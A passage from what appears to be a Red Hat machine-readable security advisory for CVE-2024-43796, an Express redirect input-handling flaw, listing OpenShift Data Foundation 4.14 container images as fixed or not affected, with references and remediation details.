"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", ], known_not_affected: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2025-01-15T01:19:29+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:0323", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", 